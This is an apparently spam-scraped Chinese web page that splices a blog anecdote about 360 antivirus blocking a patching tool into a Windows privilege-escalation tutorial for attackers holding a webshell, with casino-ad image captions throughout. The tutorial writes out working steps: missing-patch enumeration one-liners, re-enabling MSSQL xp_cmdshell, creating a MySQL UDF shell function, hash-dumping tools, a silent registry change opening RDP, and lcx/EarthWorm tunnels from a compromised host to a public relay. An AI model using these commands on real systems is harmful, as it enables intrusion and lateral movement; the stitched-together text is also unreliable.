缘起:

提权

今天在倒腾准入的东西,我们的程序在打补丁的时候竟然触发了“360木马防火墙”。哥立马难以蛋定下来,因为晚上本来打算和远道而来的奶罩兄吃个饭的,但是明天早上又要小范围发布这个平台,因为这个事情,肯定得改期了。

0x00 介绍

当攻击者拿到一个网站的webshell后,需要更进一步的进行破坏或者渗透,webshell只有网站的权限,当服务器权限配置安全时,攻击者无法执行某些高权限命令,需要提升自己的权限,通过一些方式获取权限的提升,就叫做提权

需求:

0x01 分类

360的覆盖率太高了,如果公司同事在用哥的终端体检平台打补丁的时候360的木马防火墙见红,我们就会陷入解释的沼泽中,甚至被人质疑是不是“借机装木马”了。提供打补丁功能的软件们,当你们与360共处,并且打补丁的时候,360弹出个这个玩意,你们就是个餐具。

安服务器操作系统分类

  • Windows提权
  • Linux提权

威尼斯人线上娱乐 1

0x02 提权方式

  • 操作漏洞提权
  • 第三方系统服务提权

思索:

0x03 Windows提权

1、这个问题必须解决,哥的第一个人间大炮,必须得放响了。

操作漏洞提权

  1. systeminfo命令

  2. 查看修补的补丁编号
    批处理脚本查看是否安装补丁

  3. 根据没有打补丁的补丁号码,到网址找利用程序
    http://www.7kb.org/138.html

systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3057191
KB2840221 KB3000061 KB2850851 KB2711167 KB2360937
KB2478960 KB2507938 KB2566454 KB2646524 KB2645640
KB2641653 KB944653 KB952004 KB971657 KB2620712
KB2393802 KB942831 KB2503665 KB2592799 KB956572
KB977165 KB2621440) do @type C:\Windows\Temp\temp.txt|
@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows
\Temp\temp.txt

威尼斯人线上娱乐 2

系统漏洞提权

  • CVE-2014-4113
  • CVE-2013-3660
  • CVE-2013-5065
  • MS10048

    systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195) do @type C:\Windows \Temp威尼斯人线上娱乐,\temp.txt|@find /i “%i”|| @echo %i Not Installed!)&del /f / q /a C:\Windows\Temp\temp.txt

威尼斯人线上娱乐 3
使用相关软件提权

  • PR – pr.exe
  • 巴西烤肉-Churrasco.exe
  • iis6.0溢出-iis6.0.exe
  • LPK劫持-lpk.dll

威尼斯人线上娱乐 4

2、逆向分析360的补丁库,取出黑名单,加入到我们的过滤列表里。据说360的补丁库是DES加密了的,我等菜鸟一夜之内难以解密。

第三方服务提权

  • FTP
    serv-u ftp提权
  • MSSQL
    xp_cmdshell
    mssql默认运行在系统权限上,可以通过xp_cmdshell组件执行系统命令,继承system权限

    #### 条件

    数据库 dba权限
    #### 恢复xp_cmdshell组件
    数据库操作页面执行

    USE master;
    EXEC sp_configure 'show advanced options', 1 RECONFIGURE WITH OVERRIDE;
    EXEC sp_configure 'xp_cmdshell', 1 RECONFIGURE WITH OVERRIDE;
    EXEC sp_configure 'show advanced options', 0 RECONFIGURE WITH OVERRIDE;
    

    或者使用大马自带功能
    威尼斯人线上娱乐 5
    威尼斯人线上娱乐 6

  • MySQL
    UDF提权
    User defined Function,用户定义函数。
    相关资料
    MySQL:如何编写UDF
    http://www.2cto.com/database/201110/108925.html
    UDF Compiling and Installing
    http://dev.mysql.com/doc/refman/5.7/en/udf-compiling.html

    #### UDF提权利用过程

    1、导入udf.dll到服务器指定目录
    mysql版本>=5.1
    mysql/lib/plugin
    查看mysql安装目录
    select @@basedir;
    mysql<5.1
    导入c:\windows\
    2、使用sql语句创建功能函数

    CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'
    

    3、执行mysql语句调用新创建函数

    select shell(‘cmd','whoami')
    

    4、删除创建的函数

    drop function shell;
    

    创建plugin_dir目录
    威尼斯人线上娱乐 7
    Dump udf.dll
    威尼斯人线上娱乐 8
    使用udf.dll创建函数
    威尼斯人线上娱乐 9
    使用新建的shell函数执行系统命令
    威尼斯人线上娱乐 10
    MOF提权

3、卸载360。擦,这个事情金山都做不到,我们何德何能实现如此雄伟大业。

提权后期

4、最后也是最无敌的一招:“人肉”。手动抄写所有黑名单补丁号码,并录入我们的过滤列表。嗯,就这招比较靠谱,just
do it。

导出主机密码

执行:

导出主机密码hash

  • 条件
    • administrator以上权限
  • 工具
    • wce
    • gethash
    • hashdump
      威尼斯人线上娱乐 12
      威尼斯人线上娱乐 13
      威尼斯人线上娱乐 14

1、和一哥们配合,我念数字,Y记录,执行了三分钟,我们记了30个KB号,杯具哥。一共差不多800个,啥时候到头啊,晚上还得看德国VS西班牙;遂暂停,继续思索“自动化解决方案”。

开启3389

当拿到管理员账户密码的时候,我们需要远程连接到对方的服务器,可以通过远程桌面连接(3389端口),如果3389没有开放,我们需要开启3389端口

Windows Registry Editor 
Version 5.00 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control \Terminal Server]
"fDenyTSConnections"=dword:00000000 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control \Terminal Server\Wds\rdpwd\Tds\tcp] 
"PortNumber"=dword:00000D3D 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 
"PortNumber"=dword:00000D3D

静默不提示运行注册表

regedit /s c:\3389.reg

上传3389.reg 运行
威尼斯人线上娱乐 15
威尼斯人线上娱乐 16

2、30秒后,哥爆出一个超必杀:“抓图+OCR”,思索15秒后,觉得靠谱,执行之。

端口转发

  • lcx
    windows
    公网ip的主机上:

    lcx.exe -listen 51 8080
    

    内网主机:

    lcx.exe -slave 公网主机IP 51 127.0.0.1 3389
    

    linux
    公网ip的主机上:

    ./lcx -m 2 -p1 2333 -p2 3389
    

    内网主机:

    “`
    lcx.exe -slave 你的IP 2333 肉鸡ip 3389

威尼斯人线上娱乐 17

网络环境:

(1)主机A可以随意连接外网

(2)主机B在外网无法连接未经防火墙许可的端口(例如 3389端口)

原理:

(1)内网主机A主动连接外网主机B的80端口

(2)主机B的80端口接受的数据转到5630端口

(3)从5630端口输入的数据也可以转到80端口

(4)从80端口输入的数据传到主机A

(5)主机A上的端口转发工具(LCX)再把从主机B的80
端口收到的数据转到主机A的3389端口。

(6)从主机A的3389端口输入的数据也可以 到达主机B

  • EarthWorm
    http://rootkiter.com/EarthWorm/

    公网主机

    ./ew -s rcsocks -l 1080 -e 8888
    

    内网主机

    ./ew -s rssocks -d 公网ip -e 8888
    

    威尼斯人线上娱乐 18
    威尼斯人线上娱乐 19
    威尼斯人线上娱乐 20
    威尼斯人线上娱乐 21
    威尼斯人线上娱乐 22
    威尼斯人线上娱乐 23
    配置完成后需要一款代理软件
    linux
    proxychains
    配置/etc/proxychains.conf

    socks5 127.0.0.1 1080
    
    proxychains rdesktop 10.22.4.108
    

    威尼斯人线上娱乐 24
    windows
    Proxifier(简洁)
    Sockscap(功能多)

网站地图xml地图